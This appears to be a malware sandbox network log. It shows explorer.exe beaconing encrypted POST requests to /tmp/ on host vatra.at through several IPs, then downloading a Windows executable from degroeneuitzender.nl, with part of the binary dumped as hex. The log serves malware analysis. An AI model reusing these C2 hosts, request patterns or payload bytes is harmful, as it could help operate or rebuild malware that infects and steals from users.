Jan 8, 2023 16:15:22.721873999 CET	112	IN	Data Raw: 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 48 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 10 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 84 00 10 00 10 00 Data Ascii: H

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49699	109.98.58.98	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:29.160629988 CET	1213	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://avjruv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: vatra.at
Jan 8, 2023 16:15:29.160784006 CET	1213	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 0b 6b 2c 90 f4 76 0b 75 75 21 fb 96 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?$`7C[zqNA ,[k,vuu!/ONDz1b>=DX6[1ZF8e\;7umW
Jan 8, 2023 16:15:29.397218943 CET	1213	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:29 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49700	200.46.66.71	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:30.165611029 CET	1214	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fpmhvdgw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: vatra.at
Jan 8, 2023 16:15:30.165637016 CET	1215	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3e 5f d2 fe Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA -[k,vu>_UZxXg+_E"yws\|e9=46+1K$hP{ bo$O@,~i]u+]w3-xR<#-BR0h
Jan 8, 2023 16:15:31.029139996 CET	1215	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:30 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 58 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0f 6f 41 e6 37 0f f5 fd 52 fa 8a f8 af 2c 90 2b c7 b6 2d 56 5a 9f 93 9c da 61 d9 2d 5a 1a 91 06 8f 41 28 43 5c ad Data Ascii: #\6oA7R,+-VZa-ZA(C\

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49702	58.235.189.192	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:33.708869934 CET	1828	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://daffyjk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 136 Host: vatra.at
Jan 8, 2023 16:15:33.708869934 CET	1828	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 08 6b 2c 90 f4 76 0b 75 7a 31 c7 f4 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA ,[k,vuz1SsgnI_2+1mswUXfP@y
Jan 8, 2023 16:15:34.607893944 CET	1829	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:34 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49703	109.98.58.98	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:34.758521080 CET	1830	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lubvvjyufy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 334 Host: vatra.at
Jan 8, 2023 16:15:34.758558989 CET	1830	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7d 36 f1 f0 Data Ascii: ;n%i#y{nqc\|s0h\+o'm?*$`7C[zqNA -[k,vu}6lr]b~]H%V71l"UQI==G7PtTM)x[\LV?Kq%C @Rs7ba^(OG839E
Jan 8, 2023 16:15:35.008353949 CET	1831	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:34 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49704	211.119.84.112	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2023 16:15:35.340337992 CET	1832	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tklmgewyg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: vatra.at
Jan 8, 2023 16:15:35.340359926 CET	1832	OUT	Data Raw: 3b 6e 25 12 f1 cd 69 23 aa d9 c5 0b 0f 04 79 cb 7b 0e c0 e3 6e 71 94 63 7c 0e 73 9d 30 b0 b4 68 ed 5c b5 2b 03 6f 27 6d ec ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 78 59 da ab Data Ascii: ;n%i#y{nqc\|s0h\+o'm?$`7C[zqNA -[k,vuxYS\AqJsl\8;ukgZ3uU-tT+0Y/q>m?^<G}yk.%\q"qa+StQmXI9
Jan 8, 2023 16:15:36.626543045 CET	1833	IN	HTTP/1.0 404 Not Found Date: Sun, 08 Jan 2023 15:15:35 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49701	5.135.247.111	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-08 15:15:31 UTC	0	OUT	GET /systems/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: degroeneuitzender.nl
2023-01-08 15:15:31 UTC	0	IN	HTTP/1.1 200 OK Date: Sun, 08 Jan 2023 15:15:31 GMT Server: Apache Content-Description: File Transfer Content-Disposition: attachment; filename=15535f4a.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Connection: close Transfer-Encoding: chunked Content-Type: application/octet-stream
2023-01-08 15:15:31 UTC	0	IN	Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f7 df 75 fd b3 be 1b ae b3 be 1b ae b3 be 1b ae 0e f1 8d ae b2 be 1b ae ad ec 8e ae af be 1b ae ad ec 98 ae cc be 1b ae 94 78 60 ae b4 be 1b ae b3 be 1a ae 31 be 1b ae ad ec 9f ae 90 be 1b ae ad ec 8f ae b2 be 1b ae ad ec 8a ae b2 be 1b ae 52 69 63 68 b3 be 1b ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 27 2f 62 00 00 00 00 00 Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$ux`1RichPELP'/b
2023-01-08 15:15:31 UTC	8	IN	Data Raw: 00 00 00 00 00 80 0a 40 00 00 00 04 b0 7b f4 3f 34 e6 8b d6 32 47 3c 3e 00 00 00 00 00 c0 0a 40 00 00 00 4c 1b 86 f4 3f c3 82 a9 fe e1 7c 2f 3e 00 00 00 00 00 00 0b 40 00 00 00 8c 59 90 f4 3f df fb c0 73 f1 0a 40 3e 00 00 00 00 00 40 0b 40 00 00 00 e0 6b 9a f4 3f d9 f0 c3 92 d2 61 40 3e 00 00 00 00 00 80 0b 40 00 00 00 58 53 a4 f4 3f 78 28 33 fd 9b 75 38 3e 00 00 00 00 00 c0 0b 40 00 00 00 fc 10 ae f4 3f 76 c1 4f 2c 69 62 19 3e 00 00 00 00 00 00 0c 40 00 00 00 c8 a5 b7 f4 3f 1b fe 26 4c cd 92 43 3e 00 00 00 00 00 40 0c 40 00 00 00 b8 12 c1 f4 3f 99 d1 7d 18 e3 fb 4c 3e 00 00 00 00 00 80 0c 40 00 00 00 c0 58 ca f4 3f 4c 6f a2 88 8c b7 13 3e 00 00 00 00 00 c0 0c 40 00 00 00 c0 78 d3 f4 3f 2d d4 1b cf a0 99 39 3e 00 00 00 00 00 00 0d 40 00 00 00 a0 73 dc f4 Data Ascii: @{?42G<>@L?\|/>@Y?s@>@@k?a@>@XS?x(3u8>@?vO,ib>@?&LC>@@?}L>@X?Lo>@x?-9>@s
2023-01-08 15:15:31 UTC	8	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	8	IN	Data Raw: 32 30 30 30 0d 0a 04 0a 94 fb 3c c5 41 3e 00 00 00 00 00 40 0e 40 00 00 00 28 4a 07 f5 3f 10 49 8f 16 56 09 43 3e 00 00 00 00 00 80 0e 40 00 00 00 60 77 0f f5 3f bb 84 5e 04 40 a5 4e 3e 00 00 00 00 00 c0 0e 40 00 00 00 f8 84 17 f5 3f 87 23 b9 cd 25 aa 40 3e 00 00 00 00 00 00 0f 40 00 00 00 9c 73 1f f5 3f 03 00 96 4d fb 1e 4b 3e 00 00 00 00 00 40 0f 40 00 00 00 00 44 27 f5 3f ce ae b9 51 e5 d4 2d 3e 00 00 00 00 00 80 0f 40 00 00 00 c4 f6 2e f5 3f 39 0b 21 b4 a8 ee 47 3e 00 00 00 00 00 c0 0f 40 00 00 00 94 8c 36 f5 3f 1b 2e a4 c9 cf e9 31 3e 00 00 00 00 00 00 10 40 00 00 00 08 06 3e f5 3f 2e 31 07 91 4e 63 42 3e 00 00 00 00 00 20 10 40 00 00 00 c0 63 45 f5 3f 15 e2 73 c7 94 87 31 3e 00 00 00 00 00 40 10 40 00 00 00 4c a6 4c f5 3f 02 87 6e e8 48 7f 4e 3e 00 Data Ascii: 2000<A>@@(J?IVC>@`w?^@N>@?#%@>@s?MK>@@D'?Q->@.?9!G>@6?.1>@>?.1NcB> @cE?s1>@@LL?nHN>
2023-01-08 15:15:31 UTC	16	IN	Data Raw: 08 89 01 5d c2 08 Data Ascii: ]
2023-01-08 15:15:31 UTC	16	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	16	IN	Data Raw: 32 30 30 30 0d 0a 00 c2 08 00 55 8b ec 83 ec 18 8b 45 08 53 56 8b 70 04 57 8b 38 8b 45 0c 8b 08 89 4d ec 8b 48 04 89 4d e8 8b 48 08 8b 40 0c bb 20 37 ef c6 89 4d f4 89 45 f0 c7 45 f8 20 00 00 00 8b c7 c1 e0 04 03 45 f4 89 45 fc 8b c7 c1 e8 05 89 45 0c 8b 45 f0 01 45 0c 8d 04 3b 50 8d 45 fc 50 c7 05 64 e6 bd 02 fc 03 cf ff e8 ed f8 ff ff 8b 45 0c 33 45 fc ff 75 e8 83 25 64 e6 bd 02 00 83 0d 6c e6 bd 02 ff 2b f0 8b c6 c1 e0 04 03 45 ec c7 05 68 e6 bd 02 19 36 6b ff 89 45 fc 8b c6 c1 e8 05 89 45 0c 8d 45 0c 50 e8 3d ff ff ff 8d 04 33 50 8d 45 fc 50 e8 a1 f8 ff ff 8b 45 fc 33 45 0c 81 c3 47 86 c8 61 2b f8 ff 4d f8 0f 85 6d ff ff ff 8b 45 08 89 38 5f 89 70 04 5e 5b c9 c2 08 00 8b 44 24 08 c1 e8 03 85 c0 76 1a 56 8b 74 24 08 57 8b f8 ff 74 24 14 56 e8 0a ff ff Data Ascii: 2000UESVpW8EMHMH@ 7MEE EEEEE;PEPdE3Eu%dl+Eh6kEEEP=3PEPE3EGa+MmE8_p^[D$vVt$Wt$V
2023-01-08 15:15:31 UTC	24	IN	Data Raw: cc cc cc cc cc cc Data Ascii:
2023-01-08 15:15:31 UTC	24	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	24	IN	Data Raw: 32 30 30 30 0d 0a 55 8b ec 83 ec 08 83 e4 f0 dd 1c 24 f3 0f 7e 3c 24 e8 08 00 00 00 c9 c3 f3 0f 7e 7c 24 04 66 0f 14 ff 66 0f 28 d7 66 0f 54 15 70 16 40 00 66 0f 2f 15 98 17 40 00 0f 8a 86 02 00 00 0f 83 55 02 00 00 66 0f 2f 15 88 17 40 00 73 6e 66 0f 2f 15 90 17 40 00 0f 82 f6 01 00 00 66 0f 28 ca 66 0f 59 ca 66 0f 28 d9 66 0f 59 d9 66 0f 28 2d 40 17 40 00 66 0f 59 eb 66 0f 58 2d 30 17 40 00 66 0f 59 eb 66 0f 58 2d 20 17 40 00 66 0f 59 eb 66 0f 58 2d 10 17 40 00 f2 0f 59 e9 66 0f 28 dd 66 0f c6 db 01 f2 0f 58 eb f2 0f 59 ef f2 0f 5c fd 66 0f d6 7c 24 04 dd 44 24 04 c3 66 0f 2f 15 80 17 40 00 0f 83 90 00 00 00 66 0f 28 ca 66 0f 59 ca 66 0f 28 d9 66 0f 59 d9 66 0f 28 2d 00 17 40 00 66 0f 59 eb 66 0f 58 2d f0 16 40 00 66 0f 59 eb 66 0f 58 2d e0 16 40 00 66 Data Ascii: 2000U$~<$~\|$ff(fTp@f/@Uf/@snf/@f(fYf(fYf(-@@fYfX-0@fYfX- @fYfX-@Yf(fXY\f\|$D$f/@f(fYf(fYf(-@fYfX-@fYfX-@f
2023-01-08 15:15:31 UTC	32	IN	Data Raw: c7 00 16 00 00 00 Data Ascii:
2023-01-08 15:15:31 UTC	32	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	32	IN	Data Raw: 32 30 30 30 0d 0a e8 83 05 00 00 83 c4 14 33 c0 5f 5e 5b c9 c3 8b 4d 08 3b cf 74 da 83 c8 ff 33 d2 f7 75 0c 39 45 10 77 cd 8b 7d 0c 0f af 7d 10 f7 46 0c 0c 01 00 00 89 4d fc 89 7d f4 8b df 74 08 8b 46 18 89 45 f8 eb 07 c7 45 f8 00 10 00 00 85 ff 0f 84 bf 00 00 00 8b 4e 0c 81 e1 08 01 00 00 74 2f 8b 46 04 85 c0 74 28 0f 8c af 00 00 00 8b fb 3b d8 72 02 8b f8 57 ff 75 fc ff 36 e8 83 71 00 00 29 7e 04 01 3e 83 c4 0c 2b df 01 7d fc eb 4f 3b 5d f8 72 4f 85 c9 74 0b 56 e8 6f 65 00 00 59 85 c0 75 7d 83 7d f8 00 8b fb 74 09 33 d2 8b c3 f7 75 f8 2b fa 57 ff 75 fc 56 e8 64 03 00 00 59 50 e8 10 70 00 00 83 c4 0c 83 f8 ff 74 61 8b cf 3b c7 77 02 8b c8 01 4d fc 2b d9 3b c7 72 50 8b 7d f4 eb 29 8b 45 fc 0f be 00 56 50 e8 81 fd ff ff 59 59 83 f8 ff 74 29 ff 45 fc 8b 46 Data Ascii: 20003_^[M;t3u9Ew}}FM}tFEENt/Ft(;rWu6q)~>+}O;]rOtVoeYu}}t3u+WuVdYPpta;wM+;rP})EVPYYt)EF
2023-01-08 15:15:31 UTC	40	IN	Data Raw: fd ff ff 50 ff b5 Data Ascii: P
2023-01-08 15:15:31 UTC	40	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	40	IN	Data Raw: 32 30 30 30 0d 0a a0 fd ff ff 8d 85 88 fd ff ff 53 50 ff 35 4c 99 47 00 e8 5e 0f 00 00 59 ff d0 8b bd f0 fd ff ff 83 c4 1c 81 e7 80 00 00 00 74 20 39 b5 e8 fd ff ff 75 18 8d 85 a4 fd ff ff 50 53 ff 35 58 99 47 00 e8 2f 0f 00 00 59 ff d0 59 59 80 bd ef fd ff ff 67 75 1c 3b fe 75 18 8d 85 a4 fd ff ff 50 53 ff 35 54 99 47 00 e8 0a 0f 00 00 59 ff d0 59 59 80 3b 2d 75 11 81 8d f0 fd ff ff 00 01 00 00 43 89 9d e4 fd ff ff 53 e9 03 fe ff ff c7 85 e8 fd ff ff 08 00 00 00 89 8d b8 fd ff ff eb 24 83 e8 73 0f 84 b6 fc ff ff 48 48 0f 84 89 fe ff ff 83 e8 03 0f 85 b6 01 00 00 c7 85 b8 fd ff ff 27 00 00 00 f6 85 f0 fd ff ff 80 c7 85 e0 fd ff ff 10 00 00 00 0f 84 69 fe ff ff 8a 85 b8 fd ff ff 04 51 c6 85 d4 fd ff ff 30 88 85 d5 fd ff ff c7 85 d0 fd ff ff 02 00 00 00 e9 Data Ascii: 2000SP5LG^Yt 9uPS5XG/YYYgu;uPS5TGYYY;-uCS$sHH'iQ0
2023-01-08 15:15:31 UTC	48	IN	Data Raw: a6 47 00 0f b7 04 Data Ascii: G
2023-01-08 15:15:31 UTC	48	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	48	IN	Data Raw: 32 30 30 30 0d 0a 41 83 e0 04 5d c3 6a 00 ff 75 08 e8 85 ff ff ff 59 59 5d c3 8b ff 55 8b ec 83 ec 10 ff 75 0c 8d 4d f0 e8 a2 93 ff ff 8b 45 f0 83 b8 ac 00 00 00 01 7e 16 8d 45 f0 50 68 80 00 00 00 ff 75 08 e8 ec 4e 00 00 83 c4 0c eb 12 8b 80 c8 00 00 00 8b 4d 08 0f b7 04 48 25 80 00 00 00 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd c9 c3 8b ff 55 8b ec 83 3d 84 f4 bd 02 00 75 14 8b 45 08 8b 0d 18 a6 47 00 0f b7 04 41 25 80 00 00 00 5d c3 6a 00 ff 75 08 e8 7e ff ff ff 59 59 5d c3 8b ff 55 8b ec 83 ec 10 ff 75 0c 8d 4d f0 e8 1c 93 ff ff 8b 45 f0 83 b8 ac 00 00 00 01 7e 13 8d 45 f0 50 6a 08 ff 75 08 e8 69 4e 00 00 83 c4 0c eb 10 8b 80 c8 00 00 00 8b 4d 08 0f b7 04 48 83 e0 08 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd c9 c3 8b ff 55 8b ec 83 3d 84 f4 bd 02 00 75 12 Data Ascii: 2000A]juYY]UuME~EPhuNMH%}tMapU=uEGA%]ju~YY]UuME~EPjuiNMH}tMapU=u
2023-01-08 15:15:31 UTC	56	IN	Data Raw: 4e e0 d3 eb 8d 4c Data Ascii: NL
2023-01-08 15:15:31 UTC	56	IN	Data Raw: 0d 0a Data Ascii:
